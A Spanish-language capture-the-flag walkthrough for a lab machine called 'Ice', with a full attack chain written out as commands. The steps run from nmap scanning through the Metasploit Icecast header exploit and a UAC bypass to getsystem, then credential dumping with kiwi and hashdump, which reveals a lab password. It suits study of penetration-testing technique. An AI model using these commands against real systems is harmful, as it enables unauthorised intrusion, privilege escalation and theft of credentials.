Máquina ICE
Fase 1: Reconocimiento (Reconnaissance)
Objetivo: Identificar servicios y versiones vulnerables.
- Comando:
sudo nmap -p- --open -sS -Pn -sV -sC --min-rate 5000 [IP_VICTIMA]p-: Escaneo de todos los puertos.-open: Muestra solo puertos con estado abierto.sS: TCP SYN Scan (Stealth) para mayor velocidad y discreción.Pn: Omite el descubrimiento de host (evita bloqueos de ICMP/Ping).sV / -sC: Detección de versiones y ejecución de scripts por defecto.
- Servicio Crítico: Icecast en el puerto 8000.
- El resultado del Nmap donde se vea el puerto 8000/tcp abierto con la versión
Icecast streaming media server. (Referencia:image_b9ddb0.jpg).
Evidencia Visual

Fase 2: Análisis de Vulnerabilidades
Objetivo: Encontrar el exploit adecuado para la versión detectada.
- Comando:
searchsploit icecast - Módulo MSF:
exploit/windows/http/icecast_header(CVE-2004-1561). - El terminal con los resultados de
searchsploitresaltando el exploit de Metasploit. (Referencia:image_5453a6.png).
4. Evidencia Visual

##
Fase 3: Explotación Controlada (Acceso Inicial)
Objetivo: Obtener una sesión de Meterpreter como usuario de bajos privilegios.
-
Comandos:Bash
msfconsole -q<br>use exploit/windows/http/icecast_header<br>set RHOSTS [IP_VICTIMA]<br>set LHOST [TU_IP_VPN]<br>exploit - Verificación: Ejecutar
getuidysysinfoal recibir la sesión. - El banner de “Meterpreter session 1 opened” y la info de
sysinfomostrandoWindows 7 (64 bit). (Referencia:image_afdda0.png).
3. Evidencia Visual

Fase 4: Escalada de Privilegios
Objetivo: Saltar el UAC y convertirse en SYSTEM.
-
Comandos:Bash
background<br>use exploit/windows/local/bypassuac_eventvwr<br>set SESSION 1<br>set LHOST [TU_IP_VPN]<br>set LPORT 4445<br>run - Elevar Privilegios: En la nueva sesión (Sesión 2), ejecutar:
getsystem. - El comando
getsystemconfirmando “…got system via technique 1”. (Referencia: Tu registro de terminal previo).

Fase 5: Post-Explotación y Credenciales
Objetivo: Estabilizar la sesión y extraer contraseñas.
- Migración (Vital): Debido a que el sistema es x64, hay que moverse a un proceso nativo.
- Comando:
ps - Comando:
migrate 1384(O el PID despoolsv.exe).
- Comando:
-
Extracción con Kiwi:Bash
load kiwi<br>creds_all<br>hashdump - La tabla de
wdigest credentialsmostrando el usuarioDarky su contraseñaPassword01!. (Referencia: Tu ejecución exitosa decreds_all).

6. Comandos de Verificación Final
Una vez que getsystem haya funcionado, ejecuta estos tres comandos juntos:
- Comando:
getuid- Debe responder:
Server username: NT AUTHORITY\SYSTEM
- Debe responder:
- Comando:
getprivs- Debe mostrar una lista larga. Busca
SeDebugPrivilegeoSeTakeOwnershipPrivilege
- Debe mostrar una lista larga. Busca
